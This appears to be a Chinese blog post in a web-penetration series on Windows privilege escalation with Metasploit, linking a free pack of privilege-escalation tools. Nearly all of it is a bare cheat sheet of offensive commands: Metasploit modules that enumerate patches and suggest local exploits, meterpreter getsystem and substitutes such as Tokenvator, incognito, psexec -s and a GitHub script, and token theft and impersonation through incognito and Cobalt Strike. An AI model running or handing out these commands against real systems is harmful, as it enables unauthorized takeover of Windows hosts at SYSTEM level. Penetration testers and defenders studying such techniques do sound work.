WEB渗透Win提权篇-MSF提权

  提权工具合集包（免费分享）： 夸克网盘分享

 往期文章

WEB渗透Win提权篇-提权工具合集-优快云博客

WEB渗透Win提权篇-RDP&Firewall-优快云博客

WEB渗透Win提权篇-MSSQL-优快云博客

WEB渗透Win提权篇-MYSQL-udf-优快云博客

WEB渗透Win提权篇-AccountSpoofing-优快云博客

WEB渗透Win提权篇-弱权限提权-优快云博客

WEB渗透Win提权篇-PowerUp-优快云博客

WEB渗透Win提权篇-特权文件写入提权-优快云博客

WEB渗透Win提权篇-MSF提权-优快云博客

 

MSF

发现补丁
>use post/windows/gather/enum_patches
列举可用EXP
>use post/multi/recon/local_exploit_suggester

getsystem

meterpreter> getsystem 

getsystem替代者

>Tokenvator.exe getsystem cmd.exe 
>incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe 
>psexec -s -i cmd.exe 
>python getsystem.py # from https://github.com/sailay1996/tokenx_privEsc

令牌窃取

MSF

Meterpreter>use incognito
Meterpreter>list_tokens -u
Meterpreter>impersonate_token name\\administrator
&
Meterpreter>ps
Meterpreter>steal_token pid

Cobalt strike

beacon> steal_token 1234 窃取令牌
beacon> rev2self 恢复令牌
Windows
https://gitee.com/RichChigga/incognito2